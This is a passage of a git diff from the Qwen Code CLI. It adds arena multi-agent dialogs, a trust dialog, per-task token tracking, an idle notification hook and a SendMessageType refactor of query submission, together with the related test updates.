closeTrustDialog: () => void; closePermissionsDialog: () => void; setShellModeActive: (value: boolean) => void; vimHandleInput: (key: Key) => boolean; diff --git a/packages/cli/src/ui/contexts/UIStateContext.tsx b/packages/cli/src/ui/contexts/UIStateContext.tsx index 7f2e25ec7..03bda1e58 100644 --- a/packages/cli/src/ui/contexts/UIStateContext.tsx +++ b/packages/cli/src/ui/contexts/UIStateContext.tsx @@ -34,6 +34,7 @@ import type { UpdateObject } from '../utils/updateCheck.js'; import { type UseHistoryManagerReturn } from '../hooks/useHistoryManager.js'; import { type RestartReason } from '../hooks/useIdeTrustListener.js'; import { type CodingPlanUpdateRequest } from '../hooks/useCodingPlanUpdates.js'; +import { type ArenaDialogType } from '../hooks/useArenaCommand.js'; export interface UIState { history: HistoryItem[]; @@ -53,6 +54,8 @@ export interface UIState { quittingMessages: HistoryItem[] | null; isSettingsDialogOpen: boolean; isModelDialogOpen: boolean; + isTrustDialogOpen: boolean; + activeArenaDialog: ArenaDialogType; isPermissionsDialogOpen: boolean; isApprovalModeDialogOpen: boolean; isResumeDialogOpen: boolean; @@ -135,6 +138,8 @@ export interface UIState { isMcpDialogOpen: boolean; // Feedback dialog isFeedbackDialogOpen: boolean; + // Per-task token tracking + taskStartTokens: number; } export const UIStateContext = createContext(null); diff --git a/packages/cli/src/ui/hooks/slashCommandProcessor.test.ts b/packages/cli/src/ui/hooks/slashCommandProcessor.test.ts index c48653970..49cefb39c 100644 --- a/packages/cli/src/ui/hooks/slashCommandProcessor.test.ts +++ b/packages/cli/src/ui/hooks/slashCommandProcessor.test.ts @@ -156,6 +156,7 @@ describe('useSlashCommandProcessor', () => { openEditorDialog: vi.fn(), openSettingsDialog: vi.fn(), openModelDialog: mockOpenModelDialog, + openTrustDialog: vi.fn(), openPermissionsDialog: vi.fn(), openApprovalModeDialog: vi.fn(), openResumeDialog: vi.fn(), @@ -929,6 +930,7 @@ describe('useSlashCommandProcessor', () 
=> { openEditorDialog: vi.fn(), openSettingsDialog: vi.fn(), openModelDialog: vi.fn(), + openTrustDialog: vi.fn(), openPermissionsDialog: vi.fn(), openApprovalModeDialog: vi.fn(), openResumeDialog: vi.fn(), diff --git a/packages/cli/src/ui/hooks/slashCommandProcessor.ts b/packages/cli/src/ui/hooks/slashCommandProcessor.ts index bcdeaa34c..35050623b 100644 --- a/packages/cli/src/ui/hooks/slashCommandProcessor.ts +++ b/packages/cli/src/ui/hooks/slashCommandProcessor.ts @@ -7,6 +7,7 @@ import { useCallback, useMemo, useEffect, useRef, useState } from 'react'; import { type PartListUnion } from '@google/genai'; import type { UseHistoryManagerReturn } from './useHistoryManager.js'; +import type { ArenaDialogType } from './useArenaCommand.js'; import { type Logger, type Config, @@ -68,10 +69,12 @@ const SLASH_COMMANDS_SKIP_RECORDING = new Set([ interface SlashCommandProcessorActions { openAuthDialog: () => void; + openArenaDialog?: (type: Exclude) => void; openThemeDialog: () => void; openEditorDialog: () => void; openSettingsDialog: () => void; openModelDialog: () => void; + openTrustDialog: () => void; openPermissionsDialog: () => void; openApprovalModeDialog: () => void; openResumeDialog: () => void; @@ -475,6 +478,18 @@ export const useSlashCommandProcessor = ( return { type: 'handled' }; case 'dialog': switch (result.dialog) { + case 'arena_start': + actions.openArenaDialog?.('start'); + return { type: 'handled' }; + case 'arena_select': + actions.openArenaDialog?.('select'); + return { type: 'handled' }; + case 'arena_stop': + actions.openArenaDialog?.('stop'); + return { type: 'handled' }; + case 'arena_status': + actions.openArenaDialog?.('status'); + return { type: 'handled' }; case 'auth': actions.openAuthDialog(); return { type: 'handled' }; @@ -490,6 +505,9 @@ export const useSlashCommandProcessor = ( case 'model': actions.openModelDialog(); return { type: 'handled' }; + case 'trust': + actions.openTrustDialog(); + return { type: 'handled' }; case 
'permissions': actions.openPermissionsDialog(); return { type: 'handled' }; diff --git a/packages/cli/src/ui/hooks/useAgentStreamingState.ts b/packages/cli/src/ui/hooks/useAgentStreamingState.ts new file mode 100644 index 000000000..881f715b2 --- /dev/null +++ b/packages/cli/src/ui/hooks/useAgentStreamingState.ts @@ -0,0 +1,166 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Hook that subscribes to an AgentInteractive's events and + * derives streaming state, elapsed time, input-active flag, and status. + * + * Extracts the common reactivity + derived-state pattern shared by + * AgentComposer and AgentChatView so each component only deals with + * layout and interaction. + */ + +import { useState, useEffect, useCallback, useMemo, useRef } from 'react'; +import { + AgentStatus, + AgentEventType, + isTerminalStatus, + type AgentInteractive, + type AgentEventEmitter, +} from '@qwen-code/qwen-code-core'; +import { StreamingState } from '../types.js'; +import { useTimer } from './useTimer.js'; + +// ─── Types ────────────────────────────────────────────────── + +export interface AgentStreamingInfo { + /** The agent's current lifecycle status. */ + status: AgentStatus | undefined; + /** Derived streaming state for StreamingContext / LoadingIndicator. */ + streamingState: StreamingState; + /** Whether the agent can accept user input right now. */ + isInputActive: boolean; + /** Seconds elapsed while in Responding state (resets each cycle). */ + elapsedTime: number; + /** Prompt token count from the most recent round (for context usage). */ + lastPromptTokenCount: number; +} + +// ─── Hook ─────────────────────────────────────────────────── + +/** + * Subscribe to an AgentInteractive's events and derive UI streaming state. + * + * @param interactiveAgent - The agent instance, or undefined if not yet registered. + * @param events - Which event types trigger a re-render. 
Defaults to + * STATUS_CHANGE, TOOL_WAITING_APPROVAL, and TOOL_RESULT — sufficient for + * composer / footer use. Callers like AgentChatView can pass a broader set + * (e.g. include TOOL_CALL, ROUND_END, TOOL_OUTPUT_UPDATE) for richer updates. + */ +export function useAgentStreamingState( + interactiveAgent: AgentInteractive | undefined, + events?: ReadonlyArray<(typeof AgentEventType)[keyof typeof AgentEventType]>, +): AgentStreamingInfo { + // ── Force-render on agent events ── + + const [, setTick] = useState(0); + const tickRef = useRef(0); + const forceRender = useCallback(() => { + tickRef.current += 1; + setTick(tickRef.current); + }, []); + + // ── Track last prompt token count from USAGE_METADATA events ── + + const [lastPromptTokenCount, setLastPromptTokenCount] = useState( + () => interactiveAgent?.getLastPromptTokenCount() ?? 0, + ); + + const subscribedEvents = events ?? DEFAULT_EVENTS; + + useEffect(() => { + if (!interactiveAgent) return; + const emitter: AgentEventEmitter | undefined = + interactiveAgent.getEventEmitter(); + if (!emitter) return; + + const handler = () => forceRender(); + for (const evt of subscribedEvents) { + emitter.on(evt, handler); + } + + // Dedicated listener for usage metadata — updates React state directly + // so the token count is available immediately (even if no other event + // triggers a re-render). Prefers totalTokenCount (prompt + output) + // because output becomes history for the next round, matching + // geminiChat.ts. + const usageHandler = (event: { + usage?: { totalTokenCount?: number; promptTokenCount?: number }; + }) => { + const count = + event?.usage?.totalTokenCount ?? 
event?.usage?.promptTokenCount; + if (typeof count === 'number' && count > 0) { + setLastPromptTokenCount(count); + } + }; + emitter.on(AgentEventType.USAGE_METADATA, usageHandler); + + return () => { + for (const evt of subscribedEvents) { + emitter.off(evt, handler); + } + emitter.off(AgentEventType.USAGE_METADATA, usageHandler); + }; + }, [interactiveAgent, forceRender, subscribedEvents]); + + // ── Derived state ── + + const status = interactiveAgent?.getStatus(); + const pendingApprovals = interactiveAgent?.getPendingApprovals(); + const hasPendingApprovals = + pendingApprovals !== undefined && pendingApprovals.size > 0; + + const streamingState = useMemo(() => { + if (hasPendingApprovals) { + return StreamingState.WaitingForConfirmation; + } + if (status === AgentStatus.RUNNING || status === AgentStatus.INITIALIZING) { + return StreamingState.Responding; + } + return StreamingState.Idle; + }, [status, hasPendingApprovals]); + + const isInputActive = + (streamingState === StreamingState.Idle || + streamingState === StreamingState.Responding) && + status !== undefined && + !isTerminalStatus(status); + + // ── Timer (resets each time we enter Responding) ── + + const [timerResetKey, setTimerResetKey] = useState(0); + const prevStreamingRef = useRef(streamingState); + useEffect(() => { + if ( + streamingState === StreamingState.Responding && + prevStreamingRef.current !== StreamingState.Responding + ) { + setTimerResetKey((k) => k + 1); + } + prevStreamingRef.current = streamingState; + }, [streamingState]); + + const elapsedTime = useTimer( + streamingState === StreamingState.Responding, + timerResetKey, + ); + + return { + status, + streamingState, + isInputActive, + elapsedTime, + lastPromptTokenCount, + }; +} + +// ─── Defaults ─────────────────────────────────────────────── + +const DEFAULT_EVENTS = [ + AgentEventType.STATUS_CHANGE, + AgentEventType.TOOL_WAITING_APPROVAL, + AgentEventType.TOOL_RESULT, +] as const; diff --git 
a/packages/cli/src/ui/hooks/useArenaCommand.ts b/packages/cli/src/ui/hooks/useArenaCommand.ts new file mode 100644 index 000000000..0392a0f1f --- /dev/null +++ b/packages/cli/src/ui/hooks/useArenaCommand.ts @@ -0,0 +1,37 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { useCallback, useState } from 'react'; + +export type ArenaDialogType = 'start' | 'select' | 'stop' | 'status' | null; + +interface UseArenaCommandReturn { + activeArenaDialog: ArenaDialogType; + openArenaDialog: (type: Exclude) => void; + closeArenaDialog: () => void; +} + +export function useArenaCommand(): UseArenaCommandReturn { + const [activeArenaDialog, setActiveArenaDialog] = + useState(null); + + const openArenaDialog = useCallback( + (type: Exclude) => { + setActiveArenaDialog(type); + }, + [], + ); + + const closeArenaDialog = useCallback(() => { + setActiveArenaDialog(null); + }, []); + + return { + activeArenaDialog, + openArenaDialog, + closeArenaDialog, + }; +} diff --git a/packages/cli/src/ui/hooks/useArenaInProcess.ts b/packages/cli/src/ui/hooks/useArenaInProcess.ts new file mode 100644 index 000000000..c75634a2a --- /dev/null +++ b/packages/cli/src/ui/hooks/useArenaInProcess.ts @@ -0,0 +1,177 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview useArenaInProcess — bridges ArenaManager in-process events + * to AgentViewContext agent registration. + * + * Subscribes to `config.onArenaManagerChange()` to react immediately when + * the arena manager is set or cleared. Event listeners are attached to the + * manager's emitter as soon as it appears — the backend is resolved lazily + * inside the AGENT_START handler, which only fires after the backend is + * initialized. 
+ */ + +import { useEffect, useRef } from 'react'; +import { + ArenaEventType, + ArenaSessionStatus, + DISPLAY_MODE, + type ArenaAgentStartEvent, + type ArenaManager, + type ArenaSessionCompleteEvent, + type Config, + type InProcessBackend, +} from '@qwen-code/qwen-code-core'; +import type { AgentViewActions } from '../contexts/AgentViewContext.js'; +import { theme } from '../semantic-colors.js'; + +const AGENT_COLORS = [ + theme.text.accent, + theme.text.link, + theme.status.success, + theme.status.warning, + theme.text.code, + theme.status.error, +]; + +/** + * Bridge arena in-process events to agent tab registration/unregistration. + * + * Called by AgentViewProvider — accepts config and actions directly so the + * hook has no dependency on AgentViewContext (avoiding a circular import). + */ +export function useArenaInProcess( + config: Config | null, + actions: AgentViewActions, +): void { + const actionsRef = useRef(actions); + actionsRef.current = actions; + + useEffect(() => { + if (!config) return; + + let detachArenaListeners: (() => void) | null = null; + const retryTimeouts = new Set>(); + + /** Remove agent tabs, cancel pending retries, and detach arena events. */ + const detachSession = () => { + actionsRef.current.unregisterAll(); + for (const t of retryTimeouts) clearTimeout(t); + retryTimeouts.clear(); + detachArenaListeners?.(); + detachArenaListeners = null; + }; + + /** Attach to an arena manager's event emitter. The backend is resolved + * lazily — we only need it when registering agents, not at subscribe + * time. This avoids the race where setArenaManager fires before + * manager.start() initializes the backend. */ + const attachSession = (manager: ArenaManager) => { + const emitter = manager.getEventEmitter(); + let colorIndex = 0; + + const nextColor = () => AGENT_COLORS[colorIndex++ % AGENT_COLORS.length]!; + + /** Resolve the InProcessBackend, or null if not applicable. 
*/ + const getInProcessBackend = (): InProcessBackend | null => { + const backend = manager.getBackend(); + if (!backend || backend.type !== DISPLAY_MODE.IN_PROCESS) return null; + return backend as InProcessBackend; + }; + + // Register agents that already started (events may have fired before + // the callback was attached). + const inProcessBackend = getInProcessBackend(); + if (inProcessBackend) { + for (const agentState of manager.getAgentStates()) { + const interactive = inProcessBackend.getAgent(agentState.agentId); + if (interactive) { + actionsRef.current.registerAgent( + agentState.agentId, + interactive, + agentState.model.modelId, + nextColor(), + agentState.model.displayName, + ); + } + } + } + + // AGENT_START fires *before* backend.spawnAgent() creates the + // AgentInteractive, so getAgent() may return undefined. Retry briefly. + const MAX_RETRIES = 20; + const RETRY_MS = 50; + + const onAgentStart = (event: ArenaAgentStartEvent) => { + const tryRegister = (retriesLeft: number) => { + const backend = getInProcessBackend(); + if (!backend) return; // not an in-process session + + const interactive = backend.getAgent(event.agentId); + if (interactive) { + actionsRef.current.registerAgent( + event.agentId, + interactive, + event.model.modelId, + nextColor(), + event.model.displayName, + ); + return; + } + if (retriesLeft > 0) { + const timeout = setTimeout(() => { + retryTimeouts.delete(timeout); + tryRegister(retriesLeft - 1); + }, RETRY_MS); + retryTimeouts.add(timeout); + } + }; + tryRegister(MAX_RETRIES); + }; + + const onSessionComplete = (event: ArenaSessionCompleteEvent) => { + // IDLE means agents finished but the session is still alive for + // follow-up interaction — keep the tab bar. 
+ if (event.result.status === ArenaSessionStatus.IDLE) return; + detachSession(); + }; + + const onSessionError = () => detachSession(); + + emitter.on(ArenaEventType.AGENT_START, onAgentStart); + emitter.on(ArenaEventType.SESSION_COMPLETE, onSessionComplete); + emitter.on(ArenaEventType.SESSION_ERROR, onSessionError); + + detachArenaListeners = () => { + emitter.off(ArenaEventType.AGENT_START, onAgentStart); + emitter.off(ArenaEventType.SESSION_COMPLETE, onSessionComplete); + emitter.off(ArenaEventType.SESSION_ERROR, onSessionError); + }; + }; + + const handleManagerChange = (manager: ArenaManager | null) => { + detachSession(); + if (manager) { + attachSession(manager); + } + }; + + // Subscribe to future changes. + config.onArenaManagerChange(handleManagerChange); + + // Handle the case where a manager already exists when we mount. + const current = config.getArenaManager(); + if (current) { + attachSession(current); + } + + return () => { + config.onArenaManagerChange(null); + detachSession(); + }; + }, [config]); +} diff --git a/packages/cli/src/ui/hooks/useAttentionNotifications.ts b/packages/cli/src/ui/hooks/useAttentionNotifications.ts index 7c5cd043a..39d547ee1 100644 --- a/packages/cli/src/ui/hooks/useAttentionNotifications.ts +++ b/packages/cli/src/ui/hooks/useAttentionNotifications.ts @@ -11,6 +11,11 @@ import { AttentionNotificationReason, } from '../../utils/attentionNotification.js'; import type { LoadedSettings } from '../../config/settings.js'; +import type { Config } from '@qwen-code/qwen-code-core'; +import { + fireNotificationHook, + NotificationType, +} from '@qwen-code/qwen-code-core'; export const LONG_TASK_NOTIFICATION_THRESHOLD_SECONDS = 20; @@ -19,6 +24,7 @@ interface UseAttentionNotificationsOptions { streamingState: StreamingState; elapsedTime: number; settings: LoadedSettings; + config?: Config; } export const useAttentionNotifications = ({ @@ -26,10 +32,12 @@ export const useAttentionNotifications = ({ streamingState, elapsedTime, 
settings, + config, }: UseAttentionNotificationsOptions) => { const terminalBellEnabled = settings?.merged?.general?.terminalBell ?? true; const awaitingNotificationSentRef = useRef(false); const respondingElapsedRef = useRef(0); + const idleNotificationSentRef = useRef(false); useEffect(() => { if ( @@ -51,6 +59,8 @@ export const useAttentionNotifications = ({ useEffect(() => { if (streamingState === StreamingState.Responding) { respondingElapsedRef.current = elapsedTime; + // Reset idle notification flag when responding + idleNotificationSentRef.current = false; return; } @@ -65,7 +75,28 @@ export const useAttentionNotifications = ({ } // Reset tracking for next task respondingElapsedRef.current = 0; + + // Fire idle_prompt notification hook when entering idle state + if (config && !idleNotificationSentRef.current) { + const messageBus = config.getMessageBus(); + const hooksEnabled = config.getEnableHooks(); + if (hooksEnabled && messageBus) { + fireNotificationHook( + messageBus, + 'Qwen Code is waiting for your input', + NotificationType.IdlePrompt, + 'Waiting for input', + ).catch(() => { + // Silently ignore errors - fireNotificationHook has internal error handling + // and notification hooks should not block the idle flow + }); + } + idleNotificationSentRef.current = true; + } return; } - }, [streamingState, elapsedTime, isFocused, terminalBellEnabled]); + + // Reset idle notification flag when in WaitingForConfirmation state + idleNotificationSentRef.current = false; + }, [streamingState, elapsedTime, isFocused, terminalBellEnabled, config]); }; diff --git a/packages/cli/src/ui/hooks/useAutoAcceptIndicator.ts b/packages/cli/src/ui/hooks/useAutoAcceptIndicator.ts index 3135a362b..3d075f8a6 100644 --- a/packages/cli/src/ui/hooks/useAutoAcceptIndicator.ts +++ b/packages/cli/src/ui/hooks/useAutoAcceptIndicator.ts @@ -19,6 +19,8 @@ export interface UseAutoAcceptIndicatorArgs { addItem?: (item: HistoryItemWithoutId, timestamp: number) => void; 
onApprovalModeChange?: (mode: ApprovalMode) => void; shouldBlockTab?: () => boolean; + /** When true, the keyboard handler is disabled (e.g. agent tab is active). */ + disabled?: boolean; } export function useAutoAcceptIndicator({ @@ -26,6 +28,7 @@ export function useAutoAcceptIndicator({ addItem, onApprovalModeChange, shouldBlockTab, + disabled, }: UseAutoAcceptIndicatorArgs): ApprovalMode { const currentConfigValue = config.getApprovalMode(); const [showAutoAcceptIndicator, setShowAutoAcceptIndicator] = @@ -78,7 +81,7 @@ export function useAutoAcceptIndicator({ } } }, - { isActive: true }, + { isActive: !disabled }, ); return showAutoAcceptIndicator; diff --git a/packages/cli/src/ui/hooks/useDialogClose.ts b/packages/cli/src/ui/hooks/useDialogClose.ts index d71a21190..119d1c96c 100644 --- a/packages/cli/src/ui/hooks/useDialogClose.ts +++ b/packages/cli/src/ui/hooks/useDialogClose.ts @@ -7,6 +7,7 @@ import { useCallback } from 'react'; import { SettingScope } from '../../config/settings.js'; import type { AuthType, ApprovalMode } from '@qwen-code/qwen-code-core'; +import type { ArenaDialogType } from './useArenaCommand.js'; // OpenAICredentials type (previously imported from OpenAIKeyPrompt) interface OpenAICredentials { apiKey: string; @@ -42,6 +43,10 @@ export interface DialogCloseOptions { isSettingsDialogOpen: boolean; closeSettingsDialog: () => void; + // Arena dialogs + activeArenaDialog: ArenaDialogType; + closeArenaDialog: () => void; + // Folder trust dialog isFolderTrustDialogOpen: boolean; @@ -83,6 +88,11 @@ export function useDialogClose(options: DialogCloseOptions) { return true; } + if (options.activeArenaDialog !== null) { + options.closeArenaDialog(); + return true; + } + if (options.isFolderTrustDialogOpen) { // FolderTrustDialog doesn't expose close function, but ESC would prevent exit // We follow the same pattern - prevent exit behavior diff --git a/packages/cli/src/ui/hooks/useGeminiStream.test.tsx 
b/packages/cli/src/ui/hooks/useGeminiStream.test.tsx index 49af6521e..2234db6bd 100644 --- a/packages/cli/src/ui/hooks/useGeminiStream.test.tsx +++ b/packages/cli/src/ui/hooks/useGeminiStream.test.tsx @@ -28,6 +28,7 @@ import { ApprovalMode, AuthType, GeminiEventType as ServerGeminiEventType, + SendMessageType, ToolErrorType, ToolConfirmationOutcome, } from '@qwen-code/qwen-code-core'; @@ -202,6 +203,7 @@ describe('useGeminiStream', () => { .fn() .mockReturnValue(contentGeneratorConfig), getMaxSessionTurns: vi.fn(() => 50), + getArenaAgentClient: vi.fn(() => null), } as unknown as Config; mockOnDebugMessage = vi.fn(); mockHandleSlashCommand = vi.fn().mockResolvedValue(false); @@ -482,7 +484,7 @@ describe('useGeminiStream', () => { expectedMergedResponse, expect.any(AbortSignal), 'prompt-id-2', - { isContinuation: true }, + { type: SendMessageType.ToolResult }, ); }); @@ -806,7 +808,7 @@ describe('useGeminiStream', () => { toolCallResponseParts, expect.any(AbortSignal), 'prompt-id-4', - { isContinuation: true }, + { type: SendMessageType.ToolResult }, ); }); @@ -1122,7 +1124,7 @@ describe('useGeminiStream', () => { 'This is the actual prompt from the command file.', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); expect(mockScheduleToolCalls).not.toHaveBeenCalled(); @@ -1149,7 +1151,7 @@ describe('useGeminiStream', () => { '', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); }); }); @@ -1168,7 +1170,7 @@ describe('useGeminiStream', () => { '// This is a line comment', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); }); }); @@ -1187,7 +1189,7 @@ describe('useGeminiStream', () => { '/* This is a block comment */', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); }); }); @@ -2091,7 +2093,7 @@ describe('useGeminiStream', () => { processedQueryParts, // Argument 1: The 
parts array directly expect.any(AbortSignal), // Argument 2: An AbortSignal expect.any(String), // Argument 3: The prompt_id string - undefined, // Argument 4: Options (undefined for normal prompts) + { type: SendMessageType.UserQuery }, // Argument 4: The options ); }); @@ -2879,7 +2881,7 @@ describe('useGeminiStream', () => { 'First query', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); // Verify only the first query was added to history @@ -2931,14 +2933,14 @@ describe('useGeminiStream', () => { 'First query', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); expect(mockSendMessageStream).toHaveBeenNthCalledWith( 2, 'Second query', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); }); @@ -2961,7 +2963,7 @@ describe('useGeminiStream', () => { 'Second query', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); }); }); diff --git a/packages/cli/src/ui/hooks/useGeminiStream.ts b/packages/cli/src/ui/hooks/useGeminiStream.ts index 1d4d736aa..5d39654b1 100644 --- a/packages/cli/src/ui/hooks/useGeminiStream.ts +++ b/packages/cli/src/ui/hooks/useGeminiStream.ts @@ -19,14 +19,17 @@ import type { } from '@qwen-code/qwen-code-core'; import { GeminiEventType as ServerGeminiEventType, + SendMessageType, createDebugLogger, getErrorMessage, isNodeError, MessageSenderType, logUserPrompt, + logUserRetry, GitService, UnauthorizedError, UserPromptEvent, + UserRetryEvent, logConversationFinishedEvent, ConversationFinishedEvent, ApprovalMode, @@ -431,6 +434,12 @@ export const useGeminiStream = ( isSubmittingQueryRef.current = false; abortControllerRef.current?.abort(); + // Report cancellation to arena status reporter (if in arena mode). 
+ // This is needed because cancellation during tool execution won't + // flow through sendMessageStream where the inline reportCancelled() + // lives — tools get cancelled and handleCompletedTools returns early. + config.getArenaAgentClient()?.reportCancelled(); + // Log API cancellation const prompt_id = config.getSessionId() + '########' + getPromptCount(); const cancellationEvent = new ApiCancelEvent( @@ -1086,11 +1095,11 @@ export const useGeminiStream = ( const submitQuery = useCallback( async ( query: PartListUnion, - options?: { isContinuation: boolean; skipPreparation?: boolean }, + submitType: SendMessageType = SendMessageType.UserQuery, prompt_id?: string, ) => { const allowConcurrentBtwDuringResponse = - !options?.isContinuation && + submitType === SendMessageType.UserQuery && streamingState === StreamingState.Responding && typeof query === 'string' && isBtwCommand(query); @@ -1099,7 +1108,7 @@ export const useGeminiStream = ( // which are part of the same logical flow (tool responses) if ( isSubmittingQueryRef.current && - !options?.isContinuation && + submitType !== SendMessageType.ToolResult && !allowConcurrentBtwDuringResponse ) { return; @@ -1108,7 +1117,7 @@ export const useGeminiStream = ( if ( (streamingState === StreamingState.Responding || streamingState === StreamingState.WaitingForConfirmation) && - !options?.isContinuation && + submitType !== SendMessageType.ToolResult && !allowConcurrentBtwDuringResponse ) return; @@ -1119,7 +1128,10 @@ export const useGeminiStream = ( const userMessageTimestamp = Date.now(); // Reset quota error flag when starting a new query (not a continuation) - if (!options?.isContinuation && !allowConcurrentBtwDuringResponse) { + if ( + submitType !== SendMessageType.ToolResult && + !allowConcurrentBtwDuringResponse + ) { setModelSwitchedFromQuotaError(false); // Commit any pending retry error to history (without hint) since the // user is starting a new conversation turn. 
@@ -1148,14 +1160,15 @@ export const useGeminiStream = ( } return promptIdContext.run(prompt_id, async () => { - const { queryToSend, shouldProceed } = options?.skipPreparation - ? { queryToSend: query, shouldProceed: true } - : await prepareQueryForGemini( - query, - userMessageTimestamp, - abortSignal, - prompt_id!, - ); + const { queryToSend, shouldProceed } = + submitType === SendMessageType.Retry + ? { queryToSend: query, shouldProceed: true } + : await prepareQueryForGemini( + query, + userMessageTimestamp, + abortSignal, + prompt_id!, + ); if (!shouldProceed || queryToSend === null) { isSubmittingQueryRef.current = false; @@ -1163,7 +1176,7 @@ export const useGeminiStream = ( } // Check image format support for non-continuations - if (!options?.isContinuation) { + if (submitType === SendMessageType.UserQuery) { const formatCheck = checkImageFormatsSupport(queryToSend); if (formatCheck.hasUnsupportedFormats) { addItem( @@ -1180,7 +1193,7 @@ export const useGeminiStream = ( lastPromptRef.current = finalQueryToSend; lastPromptErroredRef.current = false; - if (!options?.isContinuation) { + if (submitType === SendMessageType.UserQuery) { // trigger new prompt event for session stats in CLI startNewPrompt(); @@ -1201,6 +1214,10 @@ export const useGeminiStream = ( setThought(null); } + if (submitType === SendMessageType.Retry) { + logUserRetry(config, new UserRetryEvent(prompt_id)); + } + setIsResponding(true); setInitError(null); @@ -1209,7 +1226,7 @@ export const useGeminiStream = ( finalQueryToSend, abortSignal, prompt_id!, - options, + { type: submitType }, ); const processingStatus = await processGeminiStreamEvents( @@ -1297,7 +1314,7 @@ export const useGeminiStream = ( * * When conditions are met: * - Clears any pending auto-retry countdown to avoid duplicate retries - * - Re-submits the last query with skipPreparation: true for faster retry + * - Re-submits the last query with isRetry: true, reusing the same prompt_id * * This function is exposed via 
UIActionsContext and triggered by InputPrompt * when the user presses Ctrl+Y (bound to Command.RETRY_LAST in keyBindings.ts). @@ -1324,10 +1341,7 @@ export const useGeminiStream = ( clearRetryCountdown(); - await submitQuery(lastPrompt, { - isContinuation: false, - skipPreparation: true, - }); + await submitQuery(lastPrompt, SendMessageType.Retry); }, [streamingState, addItem, clearRetryCountdown, submitQuery]); const handleApprovalModeChange = useCallback( @@ -1446,6 +1460,9 @@ export const useGeminiStream = ( role: 'user', parts: combinedParts, }); + + // Report cancellation to arena (safety net — cancelOngoingRequest + config.getArenaAgentClient()?.reportCancelled(); } const callIdsToMarkAsSubmitted = geminiTools.map( @@ -1473,13 +1490,7 @@ export const useGeminiStream = ( return; } - submitQuery( - responsesToSend, - { - isContinuation: true, - }, - prompt_ids[0], - ); + submitQuery(responsesToSend, SendMessageType.ToolResult, prompt_ids[0]); }, [ isResponding, @@ -1488,6 +1499,7 @@ export const useGeminiStream = ( geminiClient, performMemoryRefresh, modelSwitchedFromQuotaError, + config, ], ); diff --git a/packages/cli/src/ui/hooks/useInputHistory.ts b/packages/cli/src/ui/hooks/useInputHistory.ts index 58fc9d4a6..65e0256a5 100644 --- a/packages/cli/src/ui/hooks/useInputHistory.ts +++ b/packages/cli/src/ui/hooks/useInputHistory.ts @@ -18,6 +18,7 @@ export interface UseInputHistoryReturn { handleSubmit: (value: string) => void; navigateUp: () => boolean; navigateDown: () => boolean; + resetHistoryNav: () => void; } export function useInputHistory({ @@ -107,5 +108,6 @@ export function useInputHistory({ handleSubmit, navigateUp, navigateDown, + resetHistoryNav, }; } diff --git a/packages/cli/src/ui/hooks/useLoadingIndicator.test.ts b/packages/cli/src/ui/hooks/useLoadingIndicator.test.ts index 0845658ed..25e3bfe10 100644 --- a/packages/cli/src/ui/hooks/useLoadingIndicator.test.ts +++ b/packages/cli/src/ui/hooks/useLoadingIndicator.test.ts @@ -133,4 +133,119 @@ 
describe('useLoadingIndicator', () => { }); expect(result.current.elapsedTime).toBe(0); }); + + describe('token tracking', () => { + it('should capture token snapshot when task starts', () => { + const { result, rerender } = renderHook( + ({ streamingState, currentCandidatesTokens }) => + useLoadingIndicator( + streamingState, + undefined, + currentCandidatesTokens, + ), + { + initialProps: { + streamingState: StreamingState.Idle, + currentCandidatesTokens: 100, + }, + }, + ); + + expect(result.current.taskStartTokens).toBe(0); + + act(() => { + rerender({ + streamingState: StreamingState.Responding, + currentCandidatesTokens: 100, + }); + }); + + expect(result.current.taskStartTokens).toBe(100); + }); + + it('should reset token snapshot when transitioning from Responding to Idle', async () => { + const { result, rerender } = renderHook( + ({ streamingState, currentCandidatesTokens }) => + useLoadingIndicator( + streamingState, + undefined, + currentCandidatesTokens, + ), + { + initialProps: { + streamingState: StreamingState.Idle, + currentCandidatesTokens: 0, + }, + }, + ); + + act(() => { + rerender({ + streamingState: StreamingState.Responding, + currentCandidatesTokens: 0, + }); + }); + expect(result.current.taskStartTokens).toBe(0); + + await act(async () => { + await vi.advanceTimersByTimeAsync(1000); + rerender({ + streamingState: StreamingState.Responding, + currentCandidatesTokens: 500, + }); + }); + + act(() => { + rerender({ + streamingState: StreamingState.Idle, + currentCandidatesTokens: 500, + }); + }); + + expect(result.current.taskStartTokens).toBe(0); + }); + + it('should reset token snapshot when transitioning from WaitingForConfirmation to Responding', async () => { + const { result, rerender } = renderHook( + ({ streamingState, currentCandidatesTokens }) => + useLoadingIndicator( + streamingState, + undefined, + currentCandidatesTokens, + ), + { + initialProps: { + streamingState: StreamingState.Responding, + currentCandidatesTokens: 100, + }, 
+ }, + ); + + expect(result.current.taskStartTokens).toBe(100); + + await act(async () => { + await vi.advanceTimersByTimeAsync(5000); + rerender({ + streamingState: StreamingState.Responding, + currentCandidatesTokens: 500, + }); + }); + + act(() => { + rerender({ + streamingState: StreamingState.WaitingForConfirmation, + currentCandidatesTokens: 500, + }); + }); + + act(() => { + rerender({ + streamingState: StreamingState.Responding, + currentCandidatesTokens: 500, + }); + }); + + expect(result.current.taskStartTokens).toBe(500); + }); + }); }); diff --git a/packages/cli/src/ui/hooks/useLoadingIndicator.ts b/packages/cli/src/ui/hooks/useLoadingIndicator.ts index d69df1706..63cab5711 100644 --- a/packages/cli/src/ui/hooks/useLoadingIndicator.ts +++ b/packages/cli/src/ui/hooks/useLoadingIndicator.ts @@ -7,11 +7,12 @@ import { StreamingState } from '../types.js'; import { useTimer } from './useTimer.js'; import { usePhraseCycler } from './usePhraseCycler.js'; -import { useState, useEffect, useRef } from 'react'; // Added useRef +import { useState, useEffect, useRef } from 'react'; export const useLoadingIndicator = ( 